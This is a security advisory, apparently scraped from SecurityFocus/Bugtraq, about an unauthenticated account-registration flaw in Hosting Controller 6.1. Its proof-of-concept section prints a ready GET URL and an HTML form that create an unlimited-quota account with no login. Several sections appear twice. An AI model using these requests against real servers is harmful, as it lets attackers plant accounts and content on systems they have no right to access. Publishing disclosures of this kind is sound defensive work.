Hosting Controller Unauthorized Account Registration Vulnerability
BID:13531
Info
Hosting Controller Unauthorized Account Registration Vulnerability
| Bugtraq ID: | 13531 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 06 2005 12:00AM |
| Updated: | May 06 2005 12:00AM |
| Credit: | Discovery is credited to Mouse <[email protected]>. |
| Vulnerable: |
Hosting Controller Hosting Controller 6.1 Hotfix 1.9 |
| Not Vulnerable: | |
Discussion
Hosting Controller Unauthorized Account Registration Vulnerability
Hosting Controller is reported prone to a vulnerability that allows unauthorized remote attackers to register an account.
The attacker can create a user and host content on a target computer. This issue may lead to other attacks against the computer as well.
Hosting Controller version 6.1 Hotfix 1.9 was reported to be vulnerable. It is possible that other versions are affected as well.
Hosting Controller is reported prone to a vulnerability that allows unauthorized remote attackers to register an account.
The attacker can create a user and host content on a target computer. This issue may lead to other attacks against the computer as well.
Hosting Controller version 6.1 Hotfix 1.9 was reported to be vulnerable. It is possible that other versions are affected as well.
Exploit / POC
Hosting Controller Unauthorized Account Registration Vulnerability
An exploit is not required.
Proof of concept examples are available:
http://www.example.com/admin/hosting/addsubsite.asp?loginname=Mouse&password=123456
~~~advanced.html~~~
<FORM action="http://www.example.com/admin/hosting/addsubsite.asp" method="post">
<INPUT type="hidden" name="reseller" value="resadmin" id="reseller" >
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="shabgard.org" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="Mouse" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype" >
<INPUT type="hidden" name="choice" value="1" id="Hidden7" >
<INPUT type="hidden" name="mailaccess" value="TRUE" id="Hidden5">
Mailserver: <INPUT name="MailServerType" value="IMail" id="Hidden6"><BR>
Password: <INPUT name="password" value="123456" id="Hidden8"><BR><BR>
<input type="submit" value="Make">
~~~advanced.html~~~
An exploit is not required.
Proof of concept examples are available:
http://www.example.com/admin/hosting/addsubsite.asp?loginname=Mouse&password=123456
~~~advanced.html~~~
<FORM action="http://www.example.com/admin/hosting/addsubsite.asp" method="post">
<INPUT type="hidden" name="reseller" value="resadmin" id="reseller" >
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="shabgard.org" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="Mouse" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype" >
<INPUT type="hidden" name="choice" value="1" id="Hidden7" >
<INPUT type="hidden" name="mailaccess" value="TRUE" id="Hidden5">
Mailserver: <INPUT name="MailServerType" value="IMail" id="Hidden6"><BR>
Password: <INPUT name="password" value="123456" id="Hidden8"><BR><BR>
<input type="submit" value="Make">
~~~advanced.html~~~
Solution / Fix
Hosting Controller Unauthorized Account Registration Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Hosting Controller Unauthorized Account Registration Vulnerability
References:
References:
- Hosting Controller Homepage (Hosting Controller)
- Hosting Controller unauthenticated user registeration (Mouse)